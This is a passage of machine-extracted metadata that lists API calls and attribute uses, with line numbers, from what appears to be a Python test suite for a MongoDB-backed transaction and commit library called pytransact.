"usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 314, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 315, "usage_type": "call"}, {"api_name": "py.test", "line_number": 315, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 325, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 325, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._create", "line_number": 326, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 326, "usage_type": "attribute"}, {"api_name": "bson.objectid.ObjectId", "line_number": 326, "usage_type": "call"}, {"api_name": "py.test.raises", "line_number": 332, "usage_type": "call"}, {"api_name": "py.test", "line_number": 332, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 338, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 338, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Other", "line_number": 339, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 339, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 340, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 340, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 343, "usage_type": "call"}, {"api_name": "py.test", "line_number": 343, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 347, "usage_type": "call"}, {"api_name": "py.test", "line_number": 347, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 350, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 350, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Other._query", "line_number": 351, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 351, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 362, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 362, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 363, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 363, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Other", "line_number": 373, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 373, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Related", "line_number": 374, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 374, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Other", "line_number": 380, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 380, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Related", "line_number": 381, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 381, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Other._query", "line_number": 387, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 387, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Related._query", "line_number": 389, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 389, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Related", "line_number": 391, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 391, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Other._query", "line_number": 395, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 395, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Related._query", "line_number": 398, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 398, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Other._query", "line_number": 402, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 402, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Related._query", "line_number": 405, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 405, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Other._query", "line_number": 411, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 411, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Related._query", "line_number": 414, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 414, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Other._query", "line_number": 420, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 420, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Other", "line_number": 425, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 425, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Related", "line_number": 426, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 426, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Other._query", "line_number": 429, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 429, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Related._query", "line_number": 432, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 432, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Other._query", "line_number": 437, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 437, "usage_type": "attribute"}, {"api_name": "blm.testcommit.OtherWeak", "line_number": 441, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 441, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Related", "line_number": 442, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 442, "usage_type": "attribute"}, {"api_name": "blm.testcommit.OtherWeak._query", "line_number": 445, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 445, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Related._query", "line_number": 448, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 448, "usage_type": "attribute"}, {"api_name": "blm.testcommit.OtherWeak._query", "line_number": 452, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 452, "usage_type": "attribute"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 457, "usage_type": "call"}, {"api_name": "blm.testcommit.Test", "line_number": 459, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 459, "usage_type": "attribute"}, {"api_name": "bson.objectid.ObjectId", "line_number": 466, "usage_type": "call"}, {"api_name": "blm.testcommit.Test._query", "line_number": 470, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 470, "usage_type": "attribute"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 473, "usage_type": "call"}, {"api_name": "blm.testcommit.Test._query", "line_number": 484, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 484, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 493, "usage_type": "call"}, {"api_name": "py.test", "line_number": 493, "usage_type": "attribute"}, {"api_name": "gridfs.GridFS", "line_number": 493, "usage_type": "call"}, {"api_name": "py.test.xfail", "line_number": 497, "usage_type": "call"}, {"api_name": "py.test", "line_number": 497, "usage_type": "attribute"}, {"api_name": "pytransact.commit.OperateBase", "line_number": 502, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 502, "usage_type": "name"}, {"api_name": "pytransact.commit.CommitContext", "line_number": 508, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 508, "usage_type": "name"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 509, "usage_type": "call"}, {"api_name": "py.test.xfail", "line_number": 517, "usage_type": "call"}, {"api_name": "py.test", "line_number": 517, "usage_type": "attribute"}, {"api_name": "pytransact.commit.OperateBase", "line_number": 525, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 525, "usage_type": "name"}, {"api_name": "pytransact.commit.CommitContext", "line_number": 532, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 532, "usage_type": "name"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 533, "usage_type": "call"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 550, "usage_type": "call"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 554, "usage_type": "call"}, {"api_name": "pytransact.commit.CallBlm", "line_number": 563, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 563, "usage_type": "name"}, {"api_name": "pytransact.commit.CallBlm", "line_number": 568, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 568, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 576, "usage_type": "call"}, {"api_name": "pytransact.commit.CallBlm", "line_number": 579, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 579, "usage_type": "name"}, {"api_name": "pytransact.commit.CallBlm", "line_number": 584, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 584, "usage_type": "name"}, {"api_name": "pytransact.commit.CallBlm", "line_number": 590, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 590, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 592, "usage_type": "call"}, {"api_name": "pytransact.mongo.find_one", "line_number": 596, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 596, "usage_type": "name"}, {"api_name": "blm.testcommit.Test", "line_number": 602, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 602, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 603, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 603, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 604, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 604, "usage_type": "attribute"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 612, "usage_type": "call"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 613, "usage_type": "call"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 614, "usage_type": "call"}, {"api_name": "pytransact.commit.CallBlm", "line_number": 619, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 619, "usage_type": "name"}, {"api_name": "pytransact.difftoi.DiffTOI", "line_number": 625, "usage_type": "call"}, {"api_name": "pytransact.difftoi.DiffTOI", "line_number": 629, "usage_type": "call"}, {"api_name": "blm.testcommit.Test", "line_number": 648, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 648, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 649, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 649, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 650, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 650, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 661, "usage_type": "name"}, {"api_name": "pytransact.commit.newTois", "line_number": 662, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 662, "usage_type": "name"}, {"api_name": "pytransact.commit.changedTois", "line_number": 663, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 663, "usage_type": "name"}, {"api_name": "pytransact.commit.deletedTois", "line_number": 664, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 664, "usage_type": "name"}, {"api_name": "pytransact.commit.indexData", "line_number": 665, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 665, "usage_type": "name"}, {"api_name": "pytransact.commit.results", "line_number": 666, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 666, "usage_type": "name"}, {"api_name": "pytransact.commit.error", "line_number": 667, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 667, "usage_type": "name"}, {"api_name": "blm.testcommit.Test", "line_number": 671, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 671, "usage_type": "attribute"}, {"api_name": "pytransact.commit.CallBlm", "line_number": 674, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 674, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 680, "usage_type": "call"}, {"api_name": "blm.testcommit.Test", "line_number": 682, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 682, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 683, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 683, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 685, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 685, "usage_type": "attribute"}, {"api_name": "pytransact.difftoi.DiffTOI", "line_number": 687, "usage_type": "call"}, {"api_name": "pytransact.difftoi.DiffTOI", "line_number": 690, "usage_type": "call"}, {"api_name": "pytransact.mongo.insert", "line_number": 706, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 706, "usage_type": "name"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 709, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit.fromquery", "line_number": 714, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 714, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 714, "usage_type": "name"}, {"api_name": "pytransact.mongo.find_one", "line_number": 724, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 724, "usage_type": "name"}, {"api_name": "pytransact.commit", "line_number": 728, "usage_type": "name"}, {"api_name": "pytransact.mongo.find_one", "line_number": 728, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 728, "usage_type": "name"}, {"api_name": "pytransact.commit", "line_number": 729, "usage_type": "name"}, {"api_name": "pytransact.commit", "line_number": 730, "usage_type": "name"}, {"api_name": "pytransact.commit", "line_number": 731, "usage_type": "name"}, {"api_name": "pytransact.commit", "line_number": 735, "usage_type": "name"}, {"api_name": "pytransact.mongo.find_one", "line_number": 735, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 735, "usage_type": "name"}, {"api_name": "pytransact.commit", "line_number": 736, "usage_type": "name"}, {"api_name": "pytransact.commit", "line_number": 737, "usage_type": "name"}, {"api_name": "pytransact.commit", "line_number": 738, "usage_type": "name"}, {"api_name": "pytransact.commit", "line_number": 739, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 742, "usage_type": "call"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 743, "usage_type": "call"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 744, "usage_type": "call"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 745, "usage_type": "call"}, {"api_name": "pytransact.commit.CallToi", "line_number": 750, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 750, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 750, "usage_type": "call"}, {"api_name": "pytransact.mongo.find_one", "line_number": 754, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 754, "usage_type": "name"}, {"api_name": "py.test.raises", "line_number": 756, "usage_type": "call"}, {"api_name": "py.test", "line_number": 756, "usage_type": "attribute"}, {"api_name": "gridfs.NoFile", "line_number": 756, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 763, "usage_type": "call"}, {"api_name": "pymongo.errors.OperationFailure", "line_number": 763, "usage_type": "argument"}, {"api_name": "py.test", "line_number": 763, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 768, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 768, "usage_type": "attribute"}, {"api_name": "pytransact.mongo.find_and_modify", "line_number": 769, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 769, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 770, "usage_type": "call"}, {"api_name": "blm.testcommit.Test._query", "line_number": 773, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 773, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 775, "usage_type": "call"}, {"api_name": "py.test", "line_number": 775, "usage_type": "attribute"}, {"api_name": "pytransact.commit.ToisLocked", "line_number": 775, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 775, "usage_type": "name"}, {"api_name": "blm.testcommit.Test", "line_number": 779, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 779, "usage_type": "attribute"}, {"api_name": "pytransact.commit.CallToi", "line_number": 783, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 783, "usage_type": "name"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 785, "usage_type": "call"}, {"api_name": "blm.testcommit.Test._query", "line_number": 800, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 800, "usage_type": "attribute"}, {"api_name": "py.test.skip", "line_number": 804, "usage_type": "call"}, {"api_name": "py.test", "line_number": 804, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 809, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 809, "usage_type": "attribute"}, {"api_name": "pytransact.commit.CallToi", "line_number": 811, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 811, "usage_type": "name"}, {"api_name": "pytransact.mongo.find_and_modify", "line_number": 818, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 818, "usage_type": "name"}, {"api_name": "blm.testcommit.Test._query", "line_number": 825, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 825, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 832, "usage_type": "name"}, {"api_name": "pytransact.commit", "line_number": 833, "usage_type": "name"}, {"api_name": "pytransact.commit", "line_number": 834, "usage_type": "name"}, {"api_name": "pytransact.commit._id", "line_number": 834, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 835, "usage_type": "name"}, {"api_name": "pytransact.commit", "line_number": 836, "usage_type": "name"}, {"api_name": "pytransact.commit", "line_number": 837, "usage_type": "name"}, {"api_name": "pytransact.commit.ToisLocked", "line_number": 843, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 843, "usage_type": "name"}, {"api_name": "py.test.raises", "line_number": 845, "usage_type": "call"}, {"api_name": "py.test", "line_number": 845, "usage_type": "attribute"}, {"api_name": "pytransact.commit.Timeout", "line_number": 845, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 845, "usage_type": "name"}, {"api_name": "pytransact.commit.CommitConflict", "line_number": 850, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 850, "usage_type": "name"}, {"api_name": "py.test.raises", "line_number": 852, "usage_type": "call"}, {"api_name": "py.test", "line_number": 852, "usage_type": "attribute"}, {"api_name": "pytransact.commit.Timeout", "line_number": 852, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 852, "usage_type": "name"}, {"api_name": "py.test.skip", "line_number": 855, "usage_type": "call"}, {"api_name": "py.test", "line_number": 855, "usage_type": "attribute"}, {"api_name": "bson.objectid.ObjectId", "line_number": 857, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 858, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 859, "usage_type": "call"}, {"api_name": "pytransact.mongo.insert", "line_number": 860, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 860, "usage_type": "name"}, {"api_name": "pytransact.testsupport.Time", "line_number": 889, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 896, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 897, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 898, "usage_type": "call"}, {"api_name": "pytransact.mongo.insert", "line_number": 900, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 900, "usage_type": "name"}, {"api_name": "pytransact.mongo.insert", "line_number": 902, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 902, "usage_type": "name"}, {"api_name": "pytransact.mongo.insert", "line_number": 904, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 904, "usage_type": "name"}, {"api_name": "pytransact.difftoi.DiffTOI", "line_number": 908, "usage_type": "call"}, {"api_name": "pytransact.testsupport.Fake", "line_number": 910, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 910, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 911, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit.fromdoc", "line_number": 912, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 912, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 912, "usage_type": "name"}, {"api_name": "pytransact.commit.Commit.fromdoc", "line_number": 917, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 917, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 917, "usage_type": "name"}, {"api_name": "blm.fundamental.AccessHolder", "line_number": 933, "usage_type": "call"}, {"api_name": "blm.fundamental", "line_number": 933, "usage_type": "attribute"}, {"api_name": "blm.fundamental.AccessHolder", "line_number": 934, "usage_type": "call"}, {"api_name": "blm.fundamental", "line_number": 934, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 935, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 935, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 936, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 936, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 937, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 937, "usage_type": "attribute"}, {"api_name": "pytransact.mongo.insert", "line_number": 940, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 940, "usage_type": "name"}, {"api_name": "pytransact.mongo.insert", "line_number": 943, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 943, "usage_type": "name"}, {"api_name": "pytransact.mongo.insert", "line_number": 946, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 946, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 949, "usage_type": "call"}, {"api_name": "pytransact.mongo.insert", "line_number": 951, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 951, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 955, "usage_type": "call"}, {"api_name": "pytransact.commit.CommitContext", "line_number": 957, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 957, "usage_type": "name"}, {"api_name": "pytransact.difftoi.DiffTOI", "line_number": 960, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 962, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit.fromdoc", "line_number": 963, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 963, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 963, "usage_type": "name"}, {"api_name": "blm.testcommit.Test", "line_number": 986, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 986, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 989, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 989, "usage_type": "attribute"}, {"api_name": "pytransact.commit.ChangeToi", "line_number": 990, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 990, "usage_type": "name"}, {"api_name": "blm.testcommit.Test", "line_number": 996, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 996, "usage_type": "attribute"}, {"api_name": "pytransact.commit.CommitContext", "line_number": 999, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 999, "usage_type": "name"}, {"api_name": "blm.testcommit.Test._query", "line_number": 1002, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 1002, "usage_type": "attribute"}, {"api_name": "pytransact.commit.ChangeToi", "line_number": 1003, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1003, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 1005, "usage_type": "call"}, {"api_name": "pytransact.commit.wait_for_commit", "line_number": 1013, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1013, "usage_type": "name"}, {"api_name": "blm.testcommit.Test", "line_number": 1020, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 1020, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 1023, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 1023, "usage_type": "attribute"}, {"api_name": "pytransact.commit.DeleteToi", "line_number": 1024, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1024, "usage_type": "name"}, {"api_name": "blm.testcommit.Test", "line_number": 1030, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 1030, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 1035, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 1035, "usage_type": "attribute"}, {"api_name": "pytransact.commit.DeleteToi", "line_number": 1036, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1036, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 1041, "usage_type": "call"}, {"api_name": "pytransact.commit.wait_for_commit", "line_number": 1044, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1044, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 1051, "usage_type": "call"}, {"api_name": "pytransact.commit.CreateToi", "line_number": 1052, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1052, "usage_type": "name"}, {"api_name": "blm.testcommit.Test", "line_number": 1058, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 1058, "usage_type": "attribute"}, {"api_name": "pytransact.commit.CallToi", "line_number": 1062, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1062, "usage_type": "name"}, {"api_name": "pytransact.commit.CallBlm", "line_number": 1071, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1071, "usage_type": "name"}, {"api_name": "blm.fundamental.AccessHolder", "line_number": 1078, "usage_type": "call"}, {"api_name": "blm.fundamental", "line_number": 1078, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 1079, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 1079, "usage_type": "attribute"}, {"api_name": "pytransact.commit.CallBlm", "line_number": 1084, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1084, "usage_type": "name"}, {"api_name": "pytransact.commit.CallBlm", "line_number": 1090, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1090, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 1090, "usage_type": "call"}, {"api_name": "py.test.raises", "line_number": 1092, "usage_type": "call"}, {"api_name": "py.test", "line_number": 1092, "usage_type": "attribute"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 1095, "usage_type": "call"}, {"api_name": "pytransact.commit.CallToi", "line_number": 1096, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1096, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 1096, "usage_type": "call"}, {"api_name": "pytransact.commit.CallBlm", "line_number": 1099, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1099, "usage_type": "name"}, {"api_name": "pytransact.commit.DeleteToi", "line_number": 1103, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1103, "usage_type": "name"}, {"api_name": "bson.BSON.encode", "line_number": 1105, "usage_type": "call"}, {"api_name": "bson.BSON", "line_number": 1105, "usage_type": "attribute"}, {"api_name": "pytransact.commit.Commit", "line_number": 1111, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1111, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 1112, "usage_type": "argument"}, {"api_name": "pytransact.commit.Commit", "line_number": 1130, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1130, "usage_type": "name"}, {"api_name": "pytransact.commit.Commit", "line_number": 1144, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1144, "usage_type": "name"}, {"api_name": "pytransact.commit.Commit", "line_number": 1153, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1153, "usage_type": "name"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 1158, "usage_type": "argument"}, {"api_name": "gridfs.GridOut", "line_number": 1159, "usage_type": "attribute"}, {"api_name": "pytransact.commit.Commit.fromdoc", "line_number": 1160, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 1160, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 1160, "usage_type": "name"}, {"api_name": "pytransact.commit.Commit", "line_number": 1171, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1171, "usage_type": "name"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 1172, "usage_type": "call"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 1173, "usage_type": "call"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 1174, "usage_type": "call"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 1178, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 1200, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1200, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 1220, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 1221, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1221, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 1229, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 1230, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1230, "usage_type": "name"}, {"api_name": "pytransact.commit.Commit", "line_number": 1236, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1236, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 1245, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 1246, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1246, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 1255, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 1256, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1256, "usage_type": "name"}, {"api_name": "pytransact.commit.Commit.handle", "line_number": 1261, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 1261, "usage_type": "attribute"}, {"api_name": 